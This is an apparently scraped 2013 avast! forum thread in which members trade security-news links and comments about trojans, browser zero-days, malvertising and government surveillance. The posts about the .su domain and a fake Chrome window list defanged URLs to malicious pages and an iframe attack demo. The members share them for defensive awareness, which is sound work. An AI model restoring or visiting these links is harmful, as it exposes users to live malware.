polonus
-
Trojan coders continue to attack on Russia and CIS countries
http://translate.google.ru/translate?sl=ru&tl=en&js=n&prev=_t&hl=ru&ie=UTF-8&eotf=1&u=http%3A%2F%2Fnews.drweb.com%2Fshow%2F%3Fi%3D3475%26lng%3Dru%26c%3D5&act=url
19.4.2013 - 130419-0
In the base of that number are added many modifications of this exploit.
RTF:CVE-2012-0158-AR [Expl]
Here is caught this record many modifications exploit that distributes Trojan.Encoder.
Thank you so much for your promptness in processing samples Milos
(as Trojans and exploits).
-
Hi Dimitrij,
Hope the algoritm is soon being made available so protection can be provided as algoritms when known have a certain predictability,
Damian
-
Groundhog day for routers
http://www.h-online.com/security/news/item/Groundhog-day-for-routers-1847381.html
-
How a small twitter message could influence the Dow-Jones: See: http://en.wikipedia.org/wiki/High-frequency_trading
and http://qz.com/77464/how-the-syrian-electronic-army-hacked-the-ap-and-who-are-these-guys-anyway/ (link article author = Mike Baker)
and combine the info in both articles to know what happens inside racks in pitch-dark concrete bunkers that do high frequency trading...
and suddenly a flash crash like this one...
polonus
-
according to Symantec report Opera and IE have the lowest number of vulnerabillities
see charts. http://www.dinside.no/915410/faerreste-saarbarheter-i-opera
-
55% of net users use the same password for most, if not all, websites. When will they learn? (http://nakedsecurity.sophos.com/2013/04/23/users-same-password-most-websites/)
This is something I always stress and sometimes wonder if any one actually listens. :(
-
55% of net users use the same password for most, if not all, websites. When will they learn? (http://nakedsecurity.sophos.com/2013/04/23/users-same-password-most-websites/)
This is something I always stress and sometimes wonder if any one actually listens. :(
I guess a lot of users have never heard of Lastpass add-on tool to their web browser no wonder they're using the same password for most websites what a shame :-\ :o
-
WordPress cache plugins enabled remote PHP execution
http://www.h-online.com/security/news/item/WordPress-cache-plugins-enabled-remote-PHP-execution-1848961.html
-
according to Symantec report Opera and IE have the lowest number of vulnerabillities
see charts. http://www.dinside.no/915410/faerreste-saarbarheter-i-opera
Not that many people use Opera on a regular basis. We should look for vulnerabilities in more common browsers, n'est-ce pas?
-
according to Symantec report Opera and IE have the lowest number of vulnerabillities
see charts. http://www.dinside.no/915410/faerreste-saarbarheter-i-opera
Not that many people use Opera on a regular basis. We should look for vulnerabilities in more common browsers, n'est-ce pas?
Well there are a few that use IE ;)
-
according to Symantec report Opera and IE have the lowest number of vulnerabillities
see charts. http://www.dinside.no/915410/faerreste-saarbarheter-i-opera
Not that many people use Opera on a regular basis. We should look for vulnerabilities in more common browsers, n'est-ce pas?
Well there are a few that use IE ;)
And IE isn't as flexible as Firefox and Chrome, thus IE has less vulnerabilities.
-
U.S. gives big, secret push to Internet surveillance
http://news.cnet.com/8301-13578_3-57581161-38/u.s-gives-big-secret-push-to-internet-surveillance/
https://epic.org/2013/04/epic-foia-request-reveals-deta.html
-
Apache Binary Backdoors on Cpanel-based servers
http://blog.sucuri.net/2013/04/apache-binary-backdoors-on-cpanel-based-servers.html
-
Google locks down updating on Play store
http://www.h-online.com/open/news/item/Google-locks-down-updating-on-Play-store-1851695.html
-
More fake SourceForge websites being found up: http://research.zscaler.com/2013/04/more-fake-sourceforge-websites-show-up.html
link article author for Zscaler Reasearch = Julien Sobrier
polonus
-
(http://threatpost.com/files/2013/05/shutterstock_136154249-680x400.jpg)
Watering Hole Attack Claims US Department of Labor Website (http://threatpost.com/watering-hole-attack-claims-us-department-of-labor-website/)
-
Malware invades 90% of pirate computer games
http://blogs.norman.com/2013/for-consumption/malware-invades-90-of-pirate-computer-games
-
Loads of websites are buggy and pose a security threat:
# 86% of all websites had at least one serious* vulnerability.
# The average number of serious* vulnerabilities identified per website was 56, continuing the downward trend from 79 in 2011 and 230 in 2010.
# Serious* vulnerabilities were resolved in an average of 193 days from first notification.
# 61% of all serious* vulnerabilities were resolved, slightly less than the 63% during from 2011, but still up from 53% in 2010 and far better than 2007 when it was just 35%.
Quotes taken from this report review here: https://www.whitehatsec.com/resource/stats.html
Link article author: Jeremiah Grossman
polonus
-
Microsoft Security Advisory (2847140)
Vulnerability in Internet Explorer Could Allow Remote Code Execution
http://technet.microsoft.com/en-us/security/advisory/2847140
http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx
-
Just to save an unnecessary jump to see if the vulnerability affects you, MS says in that bulletin that only IE-8 is involved in this case; 6, 7, 9 and 10 aren't affected.
-
Can Facebook videos be a scam?
Q. I tried to watch a video on Facebook, but it didn't work. It made me install a new driver and then still didn't play the video. What gives?
A. I doubt that was a real video at all. This is a scam that is common on Facebook. The post looks like a really interesting or scandalous video. When you click it, it asks you to install a driver to watch it. What you actually download is usually a junk file or a virus.
http://www.foxnews.com/tech/2013/05/05/5-burning-tech-questions-answered/
-
An avi file extension is not a guarantee that the file is a video file. You could get any .exe virus and rename it to .avi and download malware...
polonus
-
Can Facebook videos be a scam?
Q. I tried to watch a video on Facebook, but it didn't work. It made me install a new driver and then still didn't play the video. What gives?
A. I doubt that was a real video at all. This is a scam that is common on Facebook. The post looks like a really interesting or scandalous video. When you click it, it asks you to install a driver to watch it. What you actually download is usually a junk file or a virus.
http://www.foxnews.com/tech/2013/05/05/5-burning-tech-questions-answered/
I watch video's on Facebook almost everyday and have never had any new driver's installed.
-
Hi -midnight,
Well that means you only watch good vids,
polonus
-
Hi polonus
Yep! I watch only good ones.
-
hi -midnight,
If you already have not done so, change your file extensions so that all file extensions are viewable and visible to you.
In XP, Open Control Panel>Folder Options>View tab>Untick (uncheck) box for "Hide file extensions for known file types">Close Folder Options. What that will do for you is display all file extensions for any file you download or run.
Do not know path for Win 7, but am sure it is something similar...
If you see a file with the extension ending in .avi.exe (double extension) then that file is an exectuable file and is almost certainly malware. You will not see either extension unless you untick hide file extensions first, and would therefore run a malicious exectuable file and get infected. One more layer of security when (that would be you) this is done.
-
Dangerous Trojan substitutes web page
http://translate.google.ru/translate?hl=ru&sl=ru&tl=en&u=http%3A%2F%2Fnews.drweb.com%2Fshow%2F%3Fi%3D3511%26lng%3Dru%26c%3D5
http://vms.drweb.com/virus/?i=2504006&lng=en
-
Microsoft Security Advisory (2847140)
Vulnerability in Internet Explorer Could Allow Remote Code Execution
http://technet.microsoft.com/en-us/security/advisory/2847140
http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx
Exploit for new IE8 0-day vulnerability in the wild
http://www.h-online.com/security/news/item/Exploit-for-new-IE8-0-day-vulnerability-in-the-wild-1857966.html
-
Microsoft Security Advisory (2847140)
Vulnerability in Internet Explorer Could Allow Remote Code Execution
http://technet.microsoft.com/en-us/security/advisory/2847140
http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx
Exploit for new IE8 0-day vulnerability in the wild
http://www.h-online.com/security/news/item/Exploit-for-new-IE8-0-day-vulnerability-in-the-wild-1857966.html
Fix available: http://support.microsoft.com/kb/2847140#FixItForMe
-
Security Advisory for ColdFusion
http://www.adobe.com/support/security/advisories/apsa13-03.html
-
FixIt for the gaping hole in IE8 on XP: http://support.microsoft.com/kb/2847140#FixItForMe
polonus
-
FixIt for the gaping hole in IE8 on XP: http://support.microsoft.com/kb/2847140#FixItForMe (http://support.microsoft.com/kb/2847140#FixItForMe)
polonus
You're a little late. :)
Microsoft Security Advisory (2847140)
Vulnerability in Internet Explorer Could Allow Remote Code Execution
http://technet.microsoft.com/en-us/security/advisory/2847140 (http://technet.microsoft.com/en-us/security/advisory/2847140)
http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx (http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx)
Exploit for new IE8 0-day vulnerability in the wild
http://www.h-online.com/security/news/item/Exploit-for-new-IE8-0-day-vulnerability-in-the-wild-1857966.html (http://www.h-online.com/security/news/item/Exploit-for-new-IE8-0-day-vulnerability-in-the-wild-1857966.html)
Fix available: http://support.microsoft.com/kb/2847140#FixItForMe (http://support.microsoft.com/kb/2847140#FixItForMe)
-
(http://www.hotforsecurity.com/wp-content/uploads/2013/05/yahoo-block-eqads-1024x546.png)
Yahoo Mail Blocked by Browsers in Malvertising Chain Reaction (http://www.hotforsecurity.com/blog/yahoo-mail-blocked-by-browsers-in-malvertising-chain-reaction-6124.html)
-
Well, if one has AdBlock Plus installed as a browser add-on, these sort of ads will be blocked from downloading into the browser window, and no warning will appear.
An added layer of protection to have along with WebShield in avast! I never did see this warning.
-
Well, if one has AdBlock Plus installed as a browser add-on, these sort of ads will be blocked from downloading into the browser window, and no warning will appear.
An added layer of protection to have along with WebShield in avast! I never did see this warning.
Then having avast! Online Security and Web Reputation Plugin installed would have the same effect since it includes the AdBlocker. :)
I've also never seen the ad.
-
Microsoft Security Bulletin Advance Notification for May 2013
http://technet.microsoft.com/en-us/security/bulletin/ms13-may
-
Cybercriminals 'drained ATMs' in $45m world bank heist
http://www.bbc.co.uk/news/world-us-canada-22470299
$45M Bank Hack Suspect Was Shot Dead While Playing Dominoes
http://www.wired.com/threatlevel/2013/05/bank-cashing-suspect-killed/
-
Prenotification Security Advisory for Adobe Reader and Acrobat
http://www.adobe.com/support/security/bulletins/apsb13-15.html
-
Protect your privacy on Google
Do you know every Google search you've ever performed is stored on the search giant's servers? And that data is cross-linked to your search data from YouTube, Google Maps and any other Google services you use.
http://www.foxnews.com/tech/2013/05/12/protect-your-privacy-on-google/
-
Protect your privacy on Google
Do you know every Google search you've ever performed is stored on the search giant's servers? And that data is cross-linked to your search data from YouTube, Google Maps and any other Google services you use.
http://www.foxnews.com/tech/2013/05/12/protect-your-privacy-on-google/ (http://www.foxnews.com/tech/2013/05/12/protect-your-privacy-on-google/)
Certainly not anything new and not something that isn't done by the other search services. :)
(Sending a "Do not track request" also doesn't guarantee anonymity.)
-
International Space Station making laptop migration from Windows XP to Debian 6
An incident in 2008 apparently made space-station personnel more aware than ever of a computer virus' ability to disrupt operations in the absence of support from an open source community. That was the year the station computers were infected by the Gammina.AG. Virus after an astronaut brought an infected USB or flash drive into orbit. The virus infected other computers on board.
http://phys.org/news/2013-05-international-space-station-laptop-migration.html
-
Firefox- en Chrome-extensions hijack Facebookaccounts
http://www.efytimes.com/e1/fullnews.asp?edid=105970
polonus
-
Firefox- en Chrome-extensions hijack Facebookaccounts
http://www.efytimes.com/e1/fullnews.asp?edid=105970
polonus
WOW! Does this means I have to give up Firefox Browser or FF-extensions to used MS IE10 ::) :o.............and beside I don't used facebook and I don't trust it at all....... to me it's a piece of sh%t ;D like a toilet paper wiping you're bare bum with it.
-
Firefox- en Chrome-extensions hijack Facebookaccounts
http://www.efytimes.com/e1/fullnews.asp?edid=105970 (http://www.efytimes.com/e1/fullnews.asp?edid=105970)
polonus
WOW! Does this means I have to give up Firefox Browser or FF-extensions to used MS IE10 ::) :o .............and beside I don't used facebook and I don't trust it at all....... to me it's a piece of sh%t ;D like a toilet paper wiping you're bare bum with it.
In Chrome, only if you have the following extension running: chromebrasil.crx - I don't :)
-
Firefox- en Chrome-extensions hijack Facebookaccounts
http://www.efytimes.com/e1/fullnews.asp?edid=105970 (http://www.efytimes.com/e1/fullnews.asp?edid=105970)
polonus
WOW! Does this means I have to give up Firefox Browser or FF-extensions to used MS IE10 ::) :o .............and beside I don't used facebook and I don't trust it at all....... to me it's a piece of sh%t ;D like a toilet paper wiping you're bare bum with it.
In Chrome, only if you have the following extension running: chromebrasil.crx - I don't :)
Me too as I don't have chromebrasil.crx running, all I'm saying is adding an extension can be a worried because not very many people and users who don't have enough security awareness to watch what their adding to the FF browser extension. ;)
-
The Firefox extension mentioned is mozillabrasil.xpi, which is not hosted on https://addons.mozilla.org/en-US/firefox/extensions/ (https://addons.mozilla.org/en-US/firefox/extensions/), the official Firefox Add-ons site. This means that it wasn't vetted as safe. As with all software, it's best to use the official sites.
-
My simple philosophy:
If an app or extension is worth it's salt, it's available from the official source.
If you can't get the item from the Official Source, it isn't worth getting.
-
Govt surveillance, the going on Mobile Twitter, Viber, Line _ WhatsApp could get narrow in some countries: http://www.thoughtcrime.org/blog/saudi-surveillance/ link article author Moxie Marlinspike
But this is probably worldwide, and they rather not like you to know: http://www.guardian.co.uk/technology/2011/nov/01/governments-hacking-techniques-surveillance
polonus
-
Encrypting your Notes on Android to Protect Yourself From Government Cellphone Surveillance [Android]
Re: http://android.16mb.com/protect-yourself-from-government-cellphone-surveillance-android.html link article author: naruto
polonus
-
Is this the real reason behind MS acquiring skype?
http://www.zdnet.com/big-brother-microsoft-listens-in-to-your-skype-ims-7000001495/
What on the Internet does not come under surveillance now?
polonus
-
Is this the real reason behind MS acquiring skype?
http://www.zdnet.com/big-brother-microsoft-listens-in-to-your-skype-ims-7000001495/ (http://www.zdnet.com/big-brother-microsoft-listens-in-to-your-skype-ims-7000001495/)
What on the Internet does not come under surveillance now?
polonus
Strange but you agreed to all of this before Microsoft owned the service. Why is Microsoft the culprit ???
-
Hi bob3160,
You are right. I pass the news as I found it.
But as you said nothing changed,
polonus
-
Hi bob3160,
You are right. I pass the news as I found it.
But as you said nothing changed,
polonus
Simply passing along what really is nothing more than Microsoft Bashing,
isn't always the best thing to do. :)
It's fairly easy to create controversial headlines in order to have people pass them along..... ;)
(I've probably been guilty of that practice a few times.)
-
Hi bob3160,
Thank you for pointing that out to me. Sincere apologies for passing that news, without mentioning actually before and after skype was acquired nothing in this respect has changed. Both abided by what the law asked of them.
Did not post this message with MS bashing at heart, just wanted to stress the surveillance aspect of it.
With old fashioned telepone lines in Europe there is no number recognition for callers from the States, not the other way round....
polonus
-
In the hope this has not been reported here before. PushDo is back after having been downed 4 times with new enhanced evasion via DGA, read:
https://blog.damballa.com/archives/1998 link article author Damballa's Senior Researcher Jeremy Demar,
polonus
-
Computer viruses on rise for first time in years, Microsoft warns
By Jillian Scharr
Published May 17, 2013
TechNewsDaily
Cut!
In certain areas of the world the uptick was more pronounced: viruses were found on approximately 40 percent of scanned systems in Pakistan, Indonesia, Ethiopia, and Bangladesh, and on 35 percent of scanned systems in Afghanistan and 36 percent in Egypt.
These high infection rates correlate with low broadband penetration rates, Rains said. Less broadband means less opportunity for network-enabled malware like worms and Trojans to spread; the 1990s-like Internet landscape in poorer countries might create the perfect environment for viruses to thrive.”
The most popular virus worldwide is called Win32/Sality, a type of infection found most frequently on machines running Windows XP.
Continued:
http://www.foxnews.com/tech/2013/05/17/true-computer-viruses-making-global-comeback-microsoft-says/?intcmp=trending
-
Is this the real reason behind MS acquiring skype?
http://www.zdnet.com/big-brother-microsoft-listens-in-to-your-skype-ims-7000001495/
What on the Internet does not come under surveillance now?
polonus
Skype's ominous link checking: facts and speculation
http://www.h-online.com/security/features/Skype-s-ominous-link-checking-facts-and-speculation-1865629.html
-
Lockscreen Win32:Lyposit displayed as a fake MacOs app (https://blog.avast.com/2013/05/20/lockscreen-win32lyposit-displayed-as-a-fake-macos-app/)
-
A guide for journalists (and everyone else) to avoid government snoops
By John R. Quain
Published May 20, 2013
Revelations that the Department of Justice has been secretly spying on Associated Press reporters has given rise to accusations of intimidation tactics and apparent attempts to stifle whistle-blowers and a free press. It should also ring alarm bells for anyone concerned about their own privacy and freedom.
Continued:
http://www.foxnews.com/tech/2013/05/20/tech-tools-to-keep-one-step-ahead-feds/
-
Dont fear the hangover - Network detection of hangover malware samples
http://blogs.rsa.com/dont-fear-the-hangover-network-detection-of-hangover-malware-samples/
http://blogs.norman.com/2013/security-research/the-hangover-report
http://enterprise.norman.com/resource_center/unveiling_an_indian_cyberattack_infrastructure-a_special_report
http://www.welivesecurity.com/2013/05/16/targeted-threat-pakistan-india/
-
Watch out for ustealer: http://blogs.technet.com/b/mmpc/archive/2013/05/22/how-easily-usteal-my-passwords.aspx
link article author = Alden Pornasdoro MMPC
polonus
-
Malware in the Google Play Store: Enemy inside the gates (http://www.techrepublic.com/blog/google-in-the-enterprise/malware-in-the-google-play-store-enemy-inside-the-gates/2445)
-
Google researcher reveals another Windows 0-day (https://www.net-security.org/secworld.php?id=14954)
Probably a very good reason to not allow any one else access to your computer
unless you truly trust that person.
-
Sorry, posted info in wrong place: http://forum.avast.com/index.php?topic=19387.msg944623#msg944623 (http://forum.avast.com/index.php?topic=19387.msg944623#msg944623)
Local Windows Kernel Exploit per Secunia.
-
New Google Chrome version update: http://forum.avast.com/index.php?topic=19387.msg944624#msg944624 (http://forum.avast.com/index.php?topic=19387.msg944624#msg944624)
-
PayPal.com XSS Vulnerability
http://seclists.org/fulldisclosure/2013/May/163
-
:-X pro did not detect pum hijack, but got warning mal , two days ago, and i guess pro let it in, malbytes removed pum hijack today so.
-
:-X pro did not detect pum hijack, but got warning mal , two days ago, and i guess pro let it in, malbytes removed pum hijack today so.
Never heard of a pum hijack.
Care to give some details on the MBAM detection of it, the contents of the MBAM scan log should give the file name, location, malware name, etc.
Note this topic is nothing to do with avast detections or not, but about security warnings and notices in general.
The viruses and worms forum is for avast detections or missed detections, so you should start your own new topic there giving the detailed information asked for.
-
Ok, Just need to know how to stop the Malicious URL Blocked pop up stop popping up? Are there any glitches in it or has anyone else had trouble with pop ups?
-
Ok, Just need to know how to stop the Malicious URL Blocked pop up stop popping up? Are there any glitches in it or has anyone else had trouble with pop ups?
Sorry, you're posting your issue in the wrong part of the forum.
This area has to do with technical geek issues and malware exploits of common programs.
Suggest going here to this link and starting a new topic: http://forum.avast.com/index.php?board=4.0 (http://forum.avast.com/index.php?board=4.0) Once there, log in and click New Topic and begin the process of getting the help you need. Please note the sticky "Logs to assist in cleaning malware" at the top of that forum board. Please only run the first four programs and attach all logs in the new thread you created there, not here. Follow all instructions in malware log topic and await help. Help will arrive as soon as the logs are posted, or soon after.
-
Chinese Hackers Have Stolen Sensitive US Weapon Design Files
Quote :
""Making the list of system designs stolen during the hack include: the advanced Patriot missile system (PAC-3); a system for shooting down ballistic missiles known as the Terminal High Altitude Area Defense (THAAD); and the Navy’s Aegis ballistic-missile defense system. Elsewhere, classified details regarding the F/A-18 fighter jet, the F-35 Joint Strike Fighter, the V-22 Osprey, the Black Hawk helicopter and the Navy’s new Littoral Combat Ship were also nabbed"
http://www.washingtonpost.com/world/national-security/confidential-report-lists-us-weapons-system-designs-compromised-by-chinese-cyberspies/2013/05/27/a42c3e1c-c2dd-11e2-8c3b-0b5e9247e8ca_story.html
If you ask me, these are the most powerful weapons in the U.S arsenal. Chinese will probably reverse engineer it within 5-10 years.
-
Seriously? USA to legalize rootkits, spyware, ransomware and trojans to combat piracy?
http://blog.emsisoft.com/2013/05/27/seriously-usa-to-legalize-rootkits-spyware-ransomware-and-trojans-to-combat-piracy/
-
Seriously? USA to legalize rootkits, spyware, ransomware and trojans to combat piracy?
http://blog.emsisoft.com/2013/05/27/seriously-usa-to-legalize-rootkits-spyware-ransomware-and-trojans-to-combat-piracy/ (http://blog.emsisoft.com/2013/05/27/seriously-usa-to-legalize-rootkits-spyware-ransomware-and-trojans-to-combat-piracy/)
It always pays to read the whole article. Just because someone makes a proposal, doesn't make it reality.
-
Seriously? USA to legalize rootkits, spyware, ransomware and trojans to combat piracy?
http://blog.emsisoft.com/2013/05/27/seriously-usa-to-legalize-rootkits-spyware-ransomware-and-trojans-to-combat-piracy/ (http://blog.emsisoft.com/2013/05/27/seriously-usa-to-legalize-rootkits-spyware-ransomware-and-trojans-to-combat-piracy/)
It always pays to read the whole article. Just because someone makes a proposal, doesn't make it reality.
I knew it somebody would say the same thing going through my mind it "Just because someone makes a proposal, doesn't make it reality" ;) :) 8) Thank you Bob because I had to check my thought correctly as I wasn't to sure.
Edit: I hope I wasn't wasting you're time Bob ??????
-
RoR CVE-2013-0156 in the Wild
http://jarmoc.com/blog/2013/05/28/ror-cve-2013-0156-in-the-wild/
-
Analysis of a self-debugging Sirefef cryptor (https://blog.avast.com/2013/05/29/analysis-of-a-self-debugging-sirefef-cryptor/)
(https://blog.avast.com/wp-content/uploads/2013/05/sirepack-screenshot01.png)
-
Twitter's 2 step verification is easily compromised (http://securitywatch.pcmag.com/hacking/311869-how-to-hack-twitter-s-two-factor-authentication)
(http://www2.pcmag.com/media/images/386796-how-to-hack-twitter-s-two-factor-authentication.jpg?thumb=y)
-
Google changing it's SSL Certificates (http://googleonlinesecurity.blogspot.com/2013/05/changes-to-our-ssl-certificates.html)
"all of our SSL certificates will be upgraded to 2048-bit keys by the end of 2013."
I'd say that will turn SSL into SuperSSL
-
Log file vulnerability in Apache server
http://www.h-online.com/open/news/item/Log-file-vulnerability-in-Apache-server-1873651.html
-
Privacy no longer exists as I've said for a long time
If you think you can hide, you're sadly mistaken.
The following article and their Video (32 min) proves my point:
http://www.geek.com/mobile/mini-documentary-shines-a-light-on-the-surveillance-state-1556671/ (http://www.geek.com/mobile/mini-documentary-shines-a-light-on-the-surveillance-state-1556671/)
-
PayPal.com XSS Vulnerability
http://seclists.org/fulldisclosure/2013/May/163
PayPal vulnerability finally closed
http://www.h-online.com/security/news/item/PayPal-vulnerability-finally-closed-1873322.html
-
Old Soviet Union domain name attracts cybercriminal interest
Published May 31, 2013
Associated Press
MOSCOW – The Soviet Union disappeared from the map more than two decades ago. But online an `e-vil empire' is thriving.
Security experts say the .su Internet suffix assigned to the USSR in 1990 has turned into a haven for hackers who've flocked to the defunct superpower's domain space to send spam and steal money.
http://www.foxnews.com/tech/2013/05/31/ussr-old-domain-name-attracts-cybercriminals/?intcmp=HPBucket
-
Hi Johnny4745,
Thanks for that heads-up! Appreciated...
With this google search query we can get a general idea what is out there and what malcode awaits us at dot su: https://www.google.nl/search?q=urlquery.net+su&oq=urlquery.net+su&aqs=chrome.0.57.13369j0&sourceid=chrome&ie=UTF-8
Newest trojans from here for instance: https://www.virustotal.com/nl/url/45a530e0af9498f7b4776f3bd0329f3e96895a3466f26ad8e8ccb4ef267a511e/analysis/
re: http://regrunreanimator.com/newvirus/trojan/pkc-exe.htm
And anotherr one with indicator obfuscation and Blackhole landing: http://urlquery.net/report.php?id=2603621
see: http://playingwithothers.com/2013/03/06/blackhole-landing-page-obfuscation-example/ (link article author = chris Jordan)
Here the trojan is directlt blocked by avast! Web Shield as JS:Includer-NS[Trj] for urlquery etc / php?id=43243|{gzip}
htXp://urlquery.net/report.php?id=43243 (do not visit)
polonus
-
P2P botnets, new threat, much more resistant to takedown, and are larger than first estimated.
Sality, ZeroAccess, Zeus, use this type of network to control and infect. http://www.h-online.com/security/news/item/P2P-botnets-much-larger-than-they-seemed-1874071.html (http://www.h-online.com/security/news/item/P2P-botnets-much-larger-than-they-seemed-1874071.html)
-
Google researcher discloses zero-day exploit for Windows
http://www.h-online.com/security/news/item/Google-researcher-discloses-zero-day-exploit-for-Windows-1876170.html
-
Google researcher discloses zero-day exploit for Windows
http://www.h-online.com/security/news/item/Google-researcher-discloses-zero-day-exploit-for-Windows-1876170.html (http://www.h-online.com/security/news/item/Google-researcher-discloses-zero-day-exploit-for-Windows-1876170.html)
It may not be the "correct" thing to do by Ormandy but, it should result in a quick fix by MS.
If you don't get infected by this exploit, you'll soon wind up with a more secure system. ;)
-
Fake Chr5ome Browser Window to be used by miscreants built by Jack Shepherd: htxp://www.jack-shepherd.co.uk/labs/fake_chrome_browser
This could be used by attackers. See for the iFrame attack -> htxp://jsunpack.jeek.org/?report=34695c83a32b4d908a720337bae11130a45c136e
(for security researchers only, only visit in VM with script blocking enabled)
pol
-
Fake Chr5ome Browser Window to be used by miscreants built by Jack Shepherd: hxxp://www.jack-shepherd.co.uk/labs/fake_chrome_browser (http://)
This could be used by attackers. See for the iFrame attack -> hxxp://jsunpack.jeek.org/?report=34695c83a32b4d908a720337bae11130a45c136e (http://)
(for security researchers only, only visit in VM with script blocking enabled)
pol
Should the links be live ???
-
Yes I believe the jsunpack one needs to be broken as it has the example/sample code in the results page, see image for some of my web shield exclusions for some analysis sites.
Though the hxxp://jsunpack.jeek.org/?report=34695....... URL differs from my exclusion and no avast alert.
-
Hi DavidR,
Link has been broken, but the serious issue here is that we have no avast! protection for that iFrame malcode (demo) yet and that is why I reported it here.
Have to report to virus AT avast dot com.
Well, bob3160 reaction could be seen as a bit exaggerated because there still was no malcious payload attached. It was just reported as "see what malcrants could do with this knowledge"...the publication by Jack Shepard could be seen as questionable, but now as the proverbial cat seems out of the bag, better seek protection against the abuse of it in the future....
polonus
-
Well, bob3160 reaction could be seen as a bit exaggerated
we have no avast! protection for that iFrame malcode
If there's no protection (real or sample) the link needs to be broken. :o
-
Hi bob3160,
Understand that there cannot be protection for a demo as long as there is no malcode or payload in it. The only questionable thing is Jack Shepard's publication of the possinilities of this scheme for abuse. It is like a bow without an arrow, so you cannot have detection or the method or the fake page should be detected as risky. Good we alerted it in this preliminairy stage so we do not have to wait for protection as malcreants got air of it, and they soon will....
Whether Jack Shepard should have put this online is discutable, it just depends whether you are in the camp of "security through obscurity" or rather like to prepair for existing threats....
polonus
P.S. What I did and DavidR always finds this the most important part of the threat procedure is report this possible abuse with fake Google Chrome page outlay to virus AT avast dot com
Damian
-
Well the web shield has been pretty hot in iframe malware, especially hidden iframes, even without knowing what the payload is. Not to mention that payload has to be hosted somewhere and that may well be a malicious or hacked site and the network shield should also come into its own here and also the web shield on hacked sites is pretty hot. So I wouldn't say that avast has no defence against this.
EDIT: Not to mention NoScript and RequestPolicy addons in firefox. I don't know if this attempts to look like a chrome browser window, in which case those not using chrome (me) would be somewhat suspicious about this anyway.
-
Virus Total now detects social engineering in media files: http://www.h-online.com/security/news/item/VirusTotal-detects-social-engineering-in-media-files-1876237.html (http://www.h-online.com/security/news/item/VirusTotal-detects-social-engineering-in-media-files-1876237.html)
Kaspersky blog about "NetTraveler is Running": http://www.securelist.com/en/blog/8105/NetTraveler_is_Running_Red_Star_APT_Attacks_Compromise_High_Profile_Victims (http://www.securelist.com/en/blog/8105/NetTraveler_is_Running_Red_Star_APT_Attacks_Compromise_High_Profile_Victims)
-
Majority of Users Still Vulnerable to Jave Exploits
http://community.websense.com/blogs/securitylabs/archive/2013/06/04/majority-of-users-still-vulnerable-to-java-exploits.aspx
-
Microsoft Security Bulletin Advance Notification for June 2013
http://technet.microsoft.com/en-us/security/bulletin/ms13-jun
-
Facebook Alert: The ZeuS Trojan is spreading among Facebook users. Avoid clicking suspicious videos, even from friends. Zeus steals bank passwords and empties accounts! Read more on our blog, http://goo.gl/urRxA - private
-
Hetzner web hosting service hacked, customer data copied
http://www.h-online.com/security/news/item/Hetzner-web-hosting-service-hacked-customer-data-copied-1884574.html
-
So you think you can (https://encrypted-tbn1.gstatic.com/images?q=tbn:ANd9GcTTWye7Pat4IAqE8tKFNSsMqikef_rRsBML9mzEagof4SpkLjqkCQ) ?
Better think again:
http://arstechnica.com/tech-policy/2013/06/new-leak-feds-can-access-anything-in-your-google-facebook-and-more/ (http://arstechnica.com/tech-policy/2013/06/new-leak-feds-can-access-anything-in-your-google-facebook-and-more/)
If you don't want to share something, don't reveal it anywhere in the first place.
Your private thought are next for the chopping block. :'(
(http://asset1.cbsistatic.com/cnwk.1d/i/tim2/2013/06/06/prism_610x443.png)
-
If you don't want to share something, don't reveal it anywhere in the first place.
Your private thought are nexgt for the chopping block. :'(
Heard about that, it's sad. :(
-
Hi bob3160 and Asyn,
Well something we expected to be so became more credible with this news.
Yes, and it is a sad thing actually for those corporations that were forced to cooperate.
We as mere users should always have at the back of our heads that all we do on the Internet is actually done in public,
same as we would stand on a soapbox in HydePark (only this time on a global scale).
Good thing that this data collecting was only for data from citizens outside the USA...
polonus
-
Hi bob3160 and Asyn,
Well something we expected to be so became more credible with this news.
Yes, and it is a sad thing actually for those corporations that were forced to cooperate.
We as mere users should always have at the back of our heads that all we do on the Internet is actually done in public,
same as we would stand on a soapbox in HydePark (only this time on a global scale).
Good thing that this data collecting was only for data from citizens outside the USA...
polonus
The Internet Service Providers should have refused, and forced the government to charge them with a crime or put them in jail. Then if would really get the attention it needs.
The United States is becoming no better than Communist China that blocks websites it decides the people shouldn't see.
This latest unconstitutional move by out government that violates unreasonable search and seizure does have the attention of Congress, and lawmakers have vowed to reign in this administration.
-
The United States is becoming no better than Communist China that blocks websites it decides the people shouldn't see.
There is a difference. In this country it is being done "legally". ;) :o :'(
-
The United States is becoming no better than Communist China that blocks websites it decides the people shouldn't see.
There is a difference. In this country it is being done "legally". ;) :o :'(
+1 to all of the above. No more isolationist posture(s) is available now or in the future. Think "WWI Isolationists" when at that time it might have been possible for the US to not enter the first world war, no Internet existed then. Now, we are more interconnected, as in worldwide, then we ever have been. With this interconnectivity comes a certain erosion of personal privacy, (and) some of that is what we have done to ourselves.
-
Hi mchain,
Agree, but there is a positive side to it as well as we are like cells that become aware they form part of a larger organ and in the end are one body together.
This is making the status of these mortal cells more "irrelevant",
polonus
-
Paul wants to lead Supreme Court challenge to fed's tracking of Americans' calls, emails
Published June 09, 2013
Sen. Rand Paul said Sunday he wants to mount a Supreme Court challenge to the federal government logging Americans’ phone calls and Internet activities.
Cut!
“I’m going to be asking all the Internet providers and all of the phone companies: Ask your customers to join me in a class-action lawsuit,” he said. “If we get 10 million Americans saying we don’t want our phone records looked at, then maybe someone will wake up and something will change in Washington.”
The Whole Article:
http://www.foxnews.com/politics/2013/06/09/paul-wants-to-lead-supreme-court-challenge-to-fed-tracking-americans-calls/
-
HP Insight Diagnostics 9.4.0.4710 multiple vulnerabilities
http://www.kb.cert.org/vuls/id/324668
-
How to diable java plug-in in various types of IE browser with a Fix it: http://blogs.technet.com/b/srd/archive/2013/05/29/java-when-you-cannot-let-go.aspx
a “Microsoft Fix it” solution to block all Java web-attack vectors through Internet Explorer. The solution will work for all versions of Java (tested 5 and above) and all supported versions of Internet Explorer (32-bit or 64-bit)....
polonus
-
Hi bob3160 and Asyn,
Well something we expected to be so became more credible with this news.
Yes, and it is a sad thing actually for those corporations that were forced to cooperate.
